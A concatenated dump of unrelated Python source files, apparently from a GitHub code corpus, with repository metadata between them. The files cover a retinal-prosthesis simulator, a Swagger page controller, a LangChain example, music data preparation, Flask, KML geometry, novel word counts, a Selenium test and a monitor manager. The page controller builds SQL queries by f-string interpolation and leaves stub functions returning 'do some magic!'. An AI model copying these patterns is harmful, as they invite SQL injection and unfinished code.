r_dual = 1 / S
return r_dual / Configuration().params["r_matrix_conductivity"] * 1E3
def plot_resistive_mesh(self):
# Just for visualization of the resistors in the mesh. optional
plt.plot(np.diag(self.resistive_mesh * 1E-6), label='$R_{n,n}$')
plt.xlabel('Pixel Index')
plt.ylabel('Resistance (M$\Omega$)')
plt.legend()
| PalankerLab/RPSim | run_stages/resistive_mesh_stage.py | resistive_mesh_stage.py | py | 5,314 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "run_stages.common_run_stage.CommonRunStage",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "configuration.configuration_manager.Configuration",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "configuration.configuration_manager.Configuration",
... |
26104077495 | import connexion
import six
from swagger_server.models.meta_page import MetaPage # noqa: E501
from swagger_server.models.page import Page # noqa: E501
from swagger_server import util, const
from swagger_server.database import database
from swagger_server.controllers.exceptions import ExceptionHandler
from swagger_server.controllers import subpage_controller, layout_controller, social_controller
def create_page(login, pasword): # noqa: E501
"""creates a new page
creates a blank project with one blank subpage - requires creating new account (user must provide login and password) # noqa: E501
:param login:
:type login: str
:param pasword:
:type pasword: str
:rtype: Page
"""
return 'do some magic!'
def get_page(id_page): # noqa: E501
"""returns the requested page
returns page that user/admin sent request for # noqa: E501
:param id: id of page
:type id: int
:rtype: Page
"""
id = const.DEFAULT_USER
curr = database.conn.cursor(dictionary=True, buffered=True)
curr.execute(f"SELECT * FROM Pages WHERE id = {id}",)
a = curr.fetchone()
if a is None:
raise ExceptionHandler.NotFoundException
curr.execute(f"SELECT * FROM MetaPages WHERE page = {id}")
meta_query= curr.fetchone()
curr.close()
if meta_query is None:
raise connexion.exceptions.ConnexionException()
meta = MetaPage.from_dict(meta_query)
layout = layout_controller.get_layout()[0]
socials = social_controller.get_socials()
subpages = subpage_controller.get_subpage_array()
return Page(id=id, meta=meta,layout=layout,socials=socials, subpages=subpages)
def patch_meta_page(body): # noqa: E501
"""modifies a metadata of a page
# noqa: E501
:param body: Meta information of page
:type body: dict | bytes
:rtype: MetaPage
"""
if connexion.request.is_json:
body = connexion.request.get_json() # noqa: E501
return 'do some magic!'
| JakubKuderski/Programowanie_Zespolowe | server/swagger_server/controllers/page_controller.py | page_controller.py | py | 1,997 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "swagger_server.const.DEFAULT_USER",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "swagger_server.const",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "swagger_server.database.database.conn.cursor",
"line_number": 38,
"usage_type... |
36064335120 | # get chat completions by by passing one or more messages to the chat model
from langchain.chat_models import ChatOpenAI # import chat model
from langchain.schema import (
AIMessage, HumanMessage, SystemMessage) # type of message
from dotenv import dotenv_values
env_val = dotenv_values(".env")
openai_api_key = env_val["openai_api_key"]
chat = ChatOpenAI(openai_api_key=openai_api_key,
temperature=0) # init chat model
# get complition by passing a single message.
single_res = chat([HumanMessage(
content="Translate this sentence from English to Amharic. I love programing.")])
# print(single_res)
# multiple messages
messages = [
SystemMessage(
content="Your are a help full assistant that translates English to Amharic"),
HumanMessage(content="whos pen is this ?")
]
multiple_message = chat(messages)
print(multiple_message)
| bakiwebdev/langchain-local-experment | message_completions_from_a_chat_model.py | message_completions_from_a_chat_model.py | py | 882 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "dotenv.dotenv_values",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "langchain.chat_models.ChatOpenAI",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "langchain.schema.HumanMessage",
"line_number": 15,
"usage_type": "call"
},
{
... |
3766678139 | import json
import os
SEQUENCE_LENGTH = 64
DATASET_PATH = './dataset'
SINGLE_FILE_DATASET_PATH = 'file_dataset'
MAPPING_PATH = 'mapping.json'
def load(file_path):
with open(file_path, 'r') as file:
song = file.read()
return song
def save(songs, file_dataset_path):
with open(file_dataset_path, 'w') as file:
file.write(songs)
def create_single_file_dataset(dataset_path, file_dataset_path, sequence_length):
new_song_delimiter = '/ ' * sequence_length
songs = ""
for path, _, files in os.walk(dataset_path):
for file in files:
file_path = os.path.join(path, file)
song = load(file_path)
songs = songs + song + " " + new_song_delimiter
songs = songs[:-1]
save(songs, file_dataset_path)
return songs
def create_mapping(songs, mapping_path):
mappings = {}
songs = songs.split()
vocabulary = list(set(songs))
for i, symbol in enumerate(vocabulary):
mappings[symbol] = i
with open(mapping_path, 'w') as file:
json.dump(mappings, file, indent=4)
def convert_into_int(songs):
int_songs = []
with open(MAPPING_PATH, 'r') as file:
mappings = json.load(file)
songs = songs.split()
for symbol in songs:
int_songs.append(mappings[symbol])
return int_songs
def generate_training_data(sequence_length):
songs = load(SINGLE_FILE_DATASET_PATH)
int_songs = convert_into_int(songs)
inputs = []
targets = []
num_sequences = len(int_songs) - sequence_length
for i in range(num_sequences):
inputs.append(int_songs[i:sequence_length+i])
targets.append(int_songs[sequence_length+i])
print(f'there are {num_sequences} of training data')
return inputs, targets
if __name__ == '__main__':
songs = create_single_file_dataset(DATASET_PATH, SINGLE_FILE_DATASET_PATH, SEQUENCE_LENGTH)
create_mapping(songs, MAPPING_PATH)
inputs, targets = generate_training_data(SEQUENCE_LENGTH)
| Jiangyuliang0813/MusicGeneration | datasetbuilding.py | datasetbuilding.py | py | 2,007 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.walk",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "json.dump",
"line_number": 41,
... |
38420632726 | """
Creates a single-page HTTP server
"""
import os
from flask import Flask, request
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),
)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
# a simple page that says hello
@app.route('/', methods=['GET'])
def hello():
return 'HELLO'
# a simple page that says hello
@app.route('/', methods=['PUT', 'POST'])
def update():
print(request.data)
return request.data
app.run(debug=True, use_reloader=False)
| Cy83rr/web_monitor | src/web_monitor/server/server.py | server.py | py | 1,031 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number"... |
38906742448 | import math
from numpy import ndarray, array
from scipy.spatial.transform import Rotation
from .GeoShape import GeoShape
from src.pyLiveKML.KML.GeoCoordinates import GeoCoordinates
from src.pyLiveKML.KML.KML import AltitudeMode
def ellipse_gen(
x_rad: float, y_rad: float, rotation: Rotation = None, num_v: int = 32
) -> ndarray:
step = 2 * math.pi / num_v
angle = -step
for i in range(0, num_v):
angle += step
point = array([x_rad * math.cos(angle), y_rad * math.sin(angle), 0])
if rotation is not None:
point = rotation.apply(point)
yield point
class GeoEllipse(GeoShape):
def __init__(
self,
origin: GeoCoordinates,
x_radius: float,
y_radius: float,
rotation: Rotation = None,
num_vertices: int = 32,
border_width: float = 1.0,
border_color: int = 0xFFFFFFFF,
fill_color: int = 0xFFFFFFFF,
name: str = None,
selected: bool = False,
altitude_mode: AltitudeMode = AltitudeMode.CLAMP_TO_GROUND,
):
GeoShape.__init__(
self,
origin=origin,
outer_bound=list(ellipse_gen(x_radius, y_radius, rotation, num_vertices)),
inner_bounds=None,
border_width=border_width,
border_color=border_color,
fill_color=fill_color,
name=name,
selected=selected,
altitude_mode=altitude_mode,
)
| smoke-you/pyLiveKML | evals/apps/geometry/GeoEllipse.py | GeoEllipse.py | py | 1,476 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "scipy.spatial.transform.Rotation",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "math.pi",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "math.cos",
... |
9396196983 | from collections import Counter
from collections import defaultdict
from nltk.corpus import stopwords
from wordcloud import WordCloud
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from preprocess import process_text_data
from utils import load_epub
def get_word_frequency_information(book):
book_bow = defaultdict(list)
stopword = stopwords.words('english')
for chapter, text in book.items():
for sentence in text:
for word in sentence.split():
if word in stopword:
continue
book_bow[chapter].append(word)
chapters = list()
words = list()
frequencies = list()
for chapter, bow in book_bow.items():
counter = Counter(bow)
for word, frequency in counter.most_common():
chapters.append(chapter)
words.append(word)
frequencies.append(frequency)
word_frequency_information = pd.DataFrame(
zip(
chapters,
words,
frequencies
),
columns=['chapter', 'word', 'frequency']
)
word_frequency_information.to_csv(
'./output/dataframes/q2-word_frequency_information.csv',
index=False, encoding='utf-8'
)
return word_frequency_information
def get_top_word_frequency_information(word_freq_info, topn=100):
words = word_freq_info.word.unique()
frequencies =\
word_freq_info.groupby(by='word').sum().loc[words, 'frequency'].values
top_word_freq_info = pd.DataFrame(
zip(
words,
frequencies
),
columns=['word', 'frequency']
)
top_word_freq_info = top_word_freq_info.sort_values(
by='frequency', ascending=False, ignore_index=True
)
top_word_freq_info = top_word_freq_info.head(topn)
top_word_freq_info.to_csv(
'./output/dataframes/q2-top_word_frequency_information.csv',
index=False, encoding='utf-8'
)
return top_word_freq_info
def draw_barplot_top_word_frequency_information(top_word_freq_info, badwords):
badword_index =\
top_word_freq_info[top_word_freq_info.word.isin(badwords)].index
non_badword_index =\
top_word_freq_info[~top_word_freq_info.word.isin(badwords)].index
plt.figure(figsize=(12, 9))
plt.bar(
x=badword_index,
height=top_word_freq_info.loc[badword_index, 'frequency'],
color='r', label='badwords{goddam, hell, damn, bastard}'
)
plt.bar(
x=non_badword_index,
height=top_word_freq_info.loc[non_badword_index, 'frequency'],
color='b'
)
plt.legend()
plt.xticks([])
plt.xlabel('word')
plt.ylabel('frequency')
plt.title('Top Word Frequency Distribution. (feat. badwords)')
plt.savefig('./output/figures/q2-top_word_frequency.png')
def draw_wordcloud_top_word_frequency_information(top_word_freq_info):
word_freq = {word: freq for word, freq in zip(
top_word_freq_info['word'], top_word_freq_info['frequency']
)}
wc = WordCloud(
width=800,
height=800,
background_color='white',
max_words=1000,
contour_width=3,
contour_color='firebrick',
random_state=2020
)
wc = wc.generate_from_frequencies(word_freq)
plt.figure(figsize=(12, 12))
plt.imshow(wc)
plt.xticks([])
plt.yticks([])
plt.axis('off')
plt.title('WordCloud for Top Words in Novel')
plt.savefig('./output/figures/q2-top_word_frequency_wordcloud.png')
if __name__ == "__main__":
epub_path = \
'./ebook/J. D. Salinger - The Catcher in the Rye '\
'(1951, Penguin Books Ltd).epub'
book = load_epub(epub_path)
book = process_text_data(book)
word_freq_info = get_word_frequency_information(book)
top_word_freq_info = get_top_word_frequency_information(
word_freq_info, topn=200
)
badwords = ['goddam', 'hell', 'damn', 'bastard']
draw_barplot_top_word_frequency_information(top_word_freq_info, badwords)
draw_wordcloud_top_word_frequency_information(top_word_freq_info)
| dhsong95/the-catcher-in-the-rye | question2.py | question2.py | py | 4,122 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 17,
"usage_type": "name"
},
{
"api_nam... |
19801286548 | from django.urls import path
from . import views
urlpatterns =[
path('',views.login,name='index_login'),
path('login/',views.login,name='login'),
path('logout/',views.logout,name='logout'),
path('cadastrar/',views.cadastrar,name='cadastrar'),
path('dashboard/',views.dashboard,name='dashboard')
] | vitormiura/senai-cti | django/siteCurso/aluno/urls.py | urls.py | py | 317 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
13732329032 | # -*- coding: utf8 -*-
from flask_login import current_user
from app import sa
from app.models import Base
from app.helpers import ModelHelper, MutableObject
import datetime
class Comment(Base, sa.Model, ModelHelper):
__tablename__ = 'comments'
__json_meta__ = [
'id',
'text',
'profile',
'post_id',
'comment_id',
'children',
'created_at',
'modified_at'
]
id = sa.Column(sa.Integer, primary_key=True)
post_id = sa.Column(sa.Integer,
sa.ForeignKey('posts.id',
ondelete='CASCADE',
onupdate='NO ACTION'))
user_id = sa.Column(sa.Integer,
sa.ForeignKey('users.id',
ondelete='CASCADE',
onupdate='NO ACTION'))
comment_id = sa.Column(sa.Integer, default=0, index=True, nullable=False)
text = sa.Column(sa.Text)
created_at = sa.Column(sa.DateTime, default=datetime.datetime.utcnow)
modified_at = sa.Column(sa.DateTime, default=datetime.datetime.utcnow)
def __repr__(self):
return '<Comment %s>' % (self.id)
@property
def parent_comment(self):
if not self.comment_id:
return None
if not hasattr(self, '_parent_comment'):
self._parent_comment = Comment.get_by_id(self.comment_id)
return self._parent_comment
@property
def profile(self):
if not hasattr(self, '_profile'):
self._profile = {
'id': self.user_id,
'nickname': self.user.nickname,
'profile_picture_url': self.user.profile_picture_url
}
return self._profile
@property
def can_edit(self):
return (current_user.is_authenticated and
(self.user.id == current_user.id or current_user.is_admin))
@property
def can_delete(self):
return (current_user.is_authenticated and
(self.user_id == current_user.id or
self.post.user_id == current_user.id or
current_user.is_admin))
@property
def need_reply(self):
return current_user.is_authenticated and self.user_id != current_user.id
@property
def children(self):
if not hasattr(self, '_children'):
self._children = []
return self._children
@children.setter
def children(self, value):
self._children = value
| tabaresjc/HeadUP | app/models/comments/comment.py | comment.py | py | 2,541 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "app.models.Base",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "app.sa.Model",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "app.sa",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "app.helpers.ModelHelper",
... |
73826277794 | """
Main function to run the script of the pipeline
Author: Arkaan Quanunga
Date: 03/03/2022
"""
import os
import tempfile
import mlflow
import hydra
import omegaconf
# The Steps this pipeline will run- edit this based on local machine vs S3
# storage
_steps = [
# Comment this line out if you don't have any data on local machine &
# already have data present on S3
# "data_upload_S3",
"data_upload",
"data_processing",
"database_upload"
]
@hydra.main(config_name='config')
def run_pipeline(config: omegaconf.DictConfig):
"""
Running the entire pipeline flow
:param config: Getting the dictionary from config file
:return:
"""
# Set up the wandb experiment. All runs will be grouped under this name
os.environ["WANDB_PROJECT"] = config["main"]["project_name"]
os.environ["WANDB_RUN_GROUP"] = config["main"]["experiment_name"]
# Steps to execute
steps_par = config['main']['steps']
active_steps = steps_par.split(",") if steps_par != "all" else _steps
# Move to a temporary directory
with tempfile.TemporaryDirectory() as tmp_dir:
if "data_upload_S3" in active_steps:
# Upload files to S3 bucket
_ = mlflow.run(
os.path.join(
hydra.utils.get_original_cwd(),
"src",
"components",
"data_upload_S3"),
"main",
parameters={
"AWS_DEFAULT_REGION": config["main"]["AWS"]["DEFAULT_REGION_NAME"],
"bucket_name": config["data_upload_S3"]["bucket_name"],
"bucket_prefix": config["data_upload_S3"]["bucket_prefix"],
"dataset_path": config["data_upload_S3"]["path"],
})
if "data_upload" in active_steps:
# Upload file and load in W&B
_ = mlflow.run(
os.path.join(
hydra.utils.get_original_cwd(),
"src",
"components",
"data_upload_WandB2"),
"main",
parameters={
"data_location": config["data_upload_S3"]["data_location"],
"bucket_path": "s3://" +
config['data_upload_S3']['bucket_name'] +
"/" +
config["data_upload_S3"]["bucket_prefix"],
"directory_path": config["data_upload_S3"]["directory_path"],
"output_artifact": "raw_data",
"output_type": "data_upload",
"output_description": "Artifact for storage of data on Weights & Biases",
},
)
if "data_processing" in active_steps:
# Process data by extracting crucial files from data uploaded
_ = mlflow.run(
os.path.join(
hydra.utils.get_original_cwd(),
"src",
"components",
"data_processing"),
"main",
parameters={
"AWS_DEFAULT_REGION": config["main"]["AWS"]["DEFAULT_REGION_NAME"],
"data_upload_type": config["data_upload_S3"]["data_upload_type"],
"bucket_name": config["data_upload_S3"]["bucket_name"],
"input_artifact": "raw_data:latest",
"output_directory": config["data_processing"]["output_directory"],
"output_artifact": "processed_data",
"output_type": "processed_data",
"output_description": "Processing the data by" +
"separating json file to different files &" +
" uploading processed data to S3",
})
if "database_upload" in active_steps:
# Uploading Processed data to database
_ = mlflow.run(
os.path.join(
os.path.join(
hydra.utils.get_original_cwd(),
"src",
"components",
"database_upload")),
"main",
parameters={
"data_download_type": config["data_processing"]["data_upload_type"],
"MONGO_Cluster_name": config["main"]["MONGODB"]["MONGO_Cluster_name"],
"Database_name": config["database_upload"]["Database_name"],
"input_artifact": "processed_data:latest",
"output_artifact": "database_upload",
"output_type": "database_upload",
"output_description": "Uploading the processed data " +
"to a MONGO DB database for query purposes"})
if __name__ == "__main__":
run_pipeline()
| arkaan27/data-engineering-pipeline | main.py | main.py | py | 4,939 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "omegaconf.DictConfig",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "tempfile.Te... |
30196444534 | #!/usr/bin/env python3
import collections
Shader = collections.namedtuple("Shader", "name vs_path fs_path attributes uniforms subroutines")
SHADERS = [
Shader(
name = "circle",
vs_path = "circle.vert",
fs_path = "circle.frag",
attributes = ["vertex"],
uniforms = ["projection", "color", "radius"],
subroutines = {},
),
Shader(
name = "circle_filled",
vs_path = "circle.vert",
fs_path = "circle_filled.frag",
attributes = ["vertex"],
uniforms = ["projection", "color", "radius"],
subroutines = {},
),
Shader(
name = "circle_partial",
vs_path = "circle.vert",
fs_path = "circle_partial.frag",
attributes = ["vertex"],
uniforms = ["projection", "color", "radius", "angle1", "angle2"],
subroutines = {},
),
Shader(
name = "solid",
vs_path = "project.vert",
fs_path = "solid.frag",
attributes = ["vertex"],
uniforms = ["projection", "color"],
subroutines = {},
),
Shader(
name = "trail",
vs_path = "project_pos.vert",
fs_path = "trail.frag",
attributes = ["vertex"],
uniforms = ["projection", "c1", "c2", "t1", "t2", "dt", "pos1", "pos2", "r", "nebu_col" ],
subroutines = {
"trail_func" : [
"trail_default",
"trail_pulse",
"trail_wave",
"trail_flame",
"trail_nebula",
"trail_arc",
"trail_bubbles",
]
}
),
Shader(
name = "smooth",
vs_path = "smooth.vert",
fs_path = "smooth.frag",
attributes = ["vertex", "vertex_color"],
uniforms = ["projection"],
subroutines = {},
),
Shader(
name = "texture",
vs_path = "texture.vert",
fs_path = "texture.frag",
attributes = ["vertex"],
uniforms = ["projection", "color", "tex_mat"],
subroutines = {},
),
Shader(
name = "texture_interpolate",
vs_path = "texture.vert",
fs_path = "texture_interpolate.frag",
attributes = ["vertex"],
uniforms = ["projection", "color", "tex_mat", "sampler1", "sampler2", "inter"],
subroutines = {},
),
Shader(
name = "nebula",
vs_path = "nebula.vert",
fs_path = "nebula_overlay.frag",
attributes = ["vertex"],
uniforms = ["projection", "hue", "brightness", "horizon", "eddy_scale", "time"],
subroutines = {},
),
Shader(
name = "nebula_background",
vs_path = "nebula.vert",
fs_path = "nebula_background.frag",
attributes = ["vertex"],
uniforms = ["projection", "hue", "brightness", "eddy_scale", "time"],
subroutines = {},
),
Shader(
name = "nebula_map",
vs_path = "nebula_map.vert",
fs_path = "nebula_map.frag",
attributes = ["vertex"],
uniforms = ["projection", "hue", "eddy_scale", "time", "globalpos", "alpha"],
subroutines = {},
),
Shader(
name = "stars",
vs_path = "stars.vert",
fs_path = "stars.frag",
attributes = ["vertex", "brightness"],
uniforms = ["projection", "star_xy", "wh", "xy", "scale"],
subroutines = {},
),
Shader(
name = "font",
vs_path = "font.vert",
fs_path = "font.frag",
attributes = ["vertex", "tex_coord"],
uniforms = ["projection", "color", "outline_color"],
subroutines = {},
),
Shader(
name = "safelanes",
vs_path = "project_pos.vert",
fs_path = "safelanes.frag",
attributes = ["vertex"],
#uniforms = ["projection", "color", "dt", "r", "dimensions" ],
uniforms = ["projection", "color", "dimensions" ],
subroutines = {},
),
Shader(
name = "beam",
vs_path = "project_pos.vert",
fs_path = "beam.frag",
attributes = ["vertex"],
uniforms = ["projection", "color", "dt", "r", "dimensions" ],
subroutines = {
"beam_func" : [
"beam_default",
"beam_wave",
"beam_arc",
"beam_helix",
"beam_organic",
"beam_unstable",
"beam_fuzzy",
]
}
),
Shader(
name = "tk",
vs_path = "tk.vert",
fs_path = "tk.frag",
attributes = ["vertex"],
uniforms = ["projection", "c", "dc", "lc", "oc", "wh", "corner_radius"],
subroutines = {},
),
Shader(
name = "jump",
vs_path = "project_pos.vert",
fs_path = "jump.frag",
attributes = ["vertex"],
uniforms = ["projection", "progress", "direction", "dimensions"],
subroutines = {
"jump_func" : [
"jump_default",
"jump_nebula",
"jump_organic",
"jump_circular",
"jump_wind",
]
}
),
Shader(
name = "colorblind",
vs_path = "postprocess.vert",
fs_path = "colorblind.frag",
attributes = ["VertexPosition"],
uniforms = ["ClipSpaceFromLocal", "MainTex"],
subroutines = {},
),
Shader(
name = "shake",
vs_path = "postprocess.vert",
fs_path = "shake.frag",
attributes = ["VertexPosition"],
uniforms = ["ClipSpaceFromLocal", "MainTex", "shake_pos", "shake_vel", "shake_force"],
subroutines = {},
),
Shader(
name = "damage",
vs_path = "postprocess.vert",
fs_path = "damage.frag",
attributes = ["VertexPosition"],
uniforms = ["ClipSpaceFromLocal", "MainTex", "damage_strength", "love_ScreenSize"],
subroutines = {},
),
Shader(
name = "gamma_correction",
vs_path = "postprocess.vert",
fs_path = "gamma_correction.frag",
attributes = ["VertexPosition"],
uniforms = ["ClipSpaceFromLocal", "MainTex", "gamma"],
subroutines = {},
),
Shader(
name = "status",
vs_path = "project_pos.vert",
fs_path = "status.frag",
attributes = ["vertex"],
uniforms = ["projection", "ok"],
subroutines = {},
),
]
def write_header(f):
f.write("/* FILE GENERATED BY %s */\n\n" % __file__)
def generate_h_file(f):
write_header(f)
f.write("#ifndef SHADER_GEN_C_H\n")
f.write("#define SHADER_GEN_C_H\n")
f.write("#include \"opengl.h\"\n\n")
f.write("typedef struct Shaders_ {\n")
for shader in SHADERS:
f.write(" struct {\n")
f.write(" GLuint program;\n")
for attribute in shader.attributes:
f.write(" GLuint {};\n".format(attribute))
for uniform in shader.uniforms:
f.write(" GLuint {};\n".format(uniform))
for subroutine, routines in shader.subroutines.items():
f.write(" struct {\n")
f.write(" GLuint uniform;\n")
for r in routines:
f.write(f" GLuint {r};\n")
f.write(f" }} {subroutine};\n")
f.write(" }} {};\n".format(shader.name))
f.write("} Shaders;\n\n")
f.write("extern Shaders shaders;\n\n")
f.write("void shaders_load (void);\n")
f.write("void shaders_unload (void);\n")
f.write("#endif\n")
def generate_c_file(f):
write_header(f)
f.write("#include <string.h>\n")
f.write("#include \"shaders.gen.h\"\n")
f.write("#include \"opengl_shader.h\"\n\n")
f.write("Shaders shaders;\n\n")
f.write("void shaders_load (void) {\n")
for i, shader in enumerate(SHADERS):
f.write(" shaders.{}.program = gl_program_vert_frag(\"{}\", \"{}\");\n".format(
shader.name,
shader.vs_path,
shader.fs_path))
for attribute in shader.attributes:
f.write(" shaders.{}.{} = glGetAttribLocation(shaders.{}.program, \"{}\");\n".format(
shader.name,
attribute,
shader.name,
attribute))
for uniform in shader.uniforms:
f.write(" shaders.{}.{} = glGetUniformLocation(shaders.{}.program, \"{}\");\n".format(
shader.name,
uniform,
shader.name,
uniform))
f.write(" if (gl_has( OPENGL_SUBROUTINES )) {\n")
for subroutine, routines in shader.subroutines.items():
f.write(f" shaders.{shader.name}.{subroutine}.uniform = glGetSubroutineUniformLocation( shaders.{shader.name}.program, GL_FRAGMENT_SHADER, \"{subroutine}\" );\n")
for r in routines:
f.write(f" shaders.{shader.name}.{subroutine}.{r} = glGetSubroutineIndex( shaders.{shader.name}.program, GL_FRAGMENT_SHADER, \"{r}\" );\n")
f.write(" }\n");
if i != len(SHADERS) - 1:
f.write("\n")
f.write("}\n\n")
f.write("void shaders_unload (void) {\n")
for shader in SHADERS:
f.write(" glDeleteProgram(shaders.{}.program);\n".format(shader.name))
f.write(" memset(&shaders, 0, sizeof(shaders));\n")
f.write("}\n")
with open("shaders.gen.h", "w") as shaders_gen_h:
generate_h_file(shaders_gen_h)
with open("shaders.gen.c", "w") as shaders_gen_c:
generate_c_file(shaders_gen_c)
| Poussinou/naev | src/shaders_c_gen.py | shaders_c_gen.py | py | 9,168 | python | en | code | null | github-code | 1 | [
{
"api_name": "collections.namedtuple",
"line_number": 5,
"usage_type": "call"
}
] |
72163556515 | from SbisSite import SearchHelper
from selenium.webdriver.common.by import By
import time
def test_sbis(browser):
sbis_main_page = SearchHelper(browser)
# Открываем сайт
sbis_main_page.go_to_site()
# Проверяем наличие городом из моего региона в списке контактов
cities_kostroma = ['Кострома', 'Нея']
for c in cities_kostroma:
assert c in [x.text for x in sbis_main_page.get_city_names()]
# Открываем список всех регионов, выбираем нужный
new_region = 'Камчатский край'
cities_kamchatka = ['Петропавловск-Камчатский']
sbis_main_page.open_region_chooser()
region_panel = sbis_main_page.get_region_chooser_panel()
region_panel.find_element(By.XPATH, "//li/span[contains(@title,'{}')]".format(new_region)).click()
time.sleep(2)
# Проверяем что url, title и список городов показывают корректную информацию
assert '41-kamchatskij-kraj' in sbis_main_page.get_current_url()
for c in cities_kamchatka:
assert c in [x.text for x in sbis_main_page.get_city_names()]
assert new_region in sbis_main_page.get_page_title()
| deadenddanse/tenzor | Task2.py | Task2.py | py | 1,289 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "SbisSite.SearchHelper",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.common.by.By.XPATH",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "selenium.webdriver.common.by.By",
"line_number": 19,
"usage_type": "name"... |
9356428118 | import asyncio
import copy
import json
import os
import shlex
import subprocess
import sys
from datetime import datetime
from json.decoder import JSONDecodeError
from typing import Any, Dict, List, cast
import pymongo
import tornado.httpclient
from watchdog import observers
from watchdog.events import FileSystemEvent, FileSystemEventHandler
import kekmonitors.utils.tools
from kekmonitors.comms.msg import Cmd, Response, badResponse, okResponse
from kekmonitors.comms.server import Server
from kekmonitors.config import COMMANDS, ERRORS, Config, LogConfig
from kekmonitors.discord_embeds import get_mm_crash_embed
if sys.version_info[1] > 6:
import uvloop
def get_parent_directory(src: str) -> str:
"""
Return the parent directory of `src`
"""
return src[: src.rfind(os.path.sep)]
class MonitorManager(Server, FileSystemEventHandler):
"""This can be used to manage monitors/scrapers with an external api."""
def __init__(self, config: Config = None):
if not config:
config = Config()
# set default name if not already set in config
if not config["OtherConfig"]["socket_name"]:
config["OtherConfig"]["socket_name"] = f"Executable.MonitorManager"
self.config = config
# create logger
logconfig = LogConfig(config)
logconfig["OtherConfig"]["socket_name"] += ".General"
self.general_logger = kekmonitors.utils.tools.get_logger(logconfig)
if sys.version_info[1] > 6:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
else:
self.general_logger.warning(
f"You're currently running python {sys.version_info[0]}.{sys.version_info[1]}, which does not support uvloop. Please consider upgrading to at least 3.7, since uvloop brings many enhancements to the asyncio loop."
)
super().__init__(
config, f"{self.config['GlobalConfig']['socket_path']}/MonitorManager"
) # Server init
super(Server).__init__() # FileSystemEventHandler init
# initialize callbacks
self.cmd_to_callback[COMMANDS.MM_STOP_MONITOR_MANAGER] = self._stop_serving
self.cmd_to_callback[COMMANDS.MM_ADD_MONITOR] = self.on_add_monitor
self.cmd_to_callback[COMMANDS.MM_ADD_SCRAPER] = self.on_add_scraper
self.cmd_to_callback[
COMMANDS.MM_ADD_MONITOR_SCRAPER
] = self.on_add_monitor_scraper
self.cmd_to_callback[COMMANDS.MM_STOP_MONITOR] = self.on_stop_monitor
self.cmd_to_callback[COMMANDS.MM_STOP_SCRAPER] = self.on_stop_scraper
self.cmd_to_callback[
COMMANDS.MM_STOP_MONITOR_SCRAPER
] = self.on_stop_monitor_scraper
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_STATUS
] = self.on_get_monitor_status
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_STATUS
] = self.on_get_scraper_status
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_SCRAPER_STATUS
] = self.on_get_status
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_CONFIG
] = self.on_get_monitor_config
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_CONFIG
] = self.on_set_monitor_config
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_WHITELIST
] = self.on_get_monitor_whitelist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_WHITELIST
] = self.on_set_monitor_whitelist
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_BLACKLIST
] = self.on_get_monitor_blacklist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_BLACKLIST
] = self.on_set_monitor_blacklist
self.cmd_to_callback[
COMMANDS.MM_GET_MONITOR_WEBHOOKS
] = self.on_get_monitor_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_WEBHOOKS
] = self.on_set_monitor_webhooks
self.cmd_to_callback[
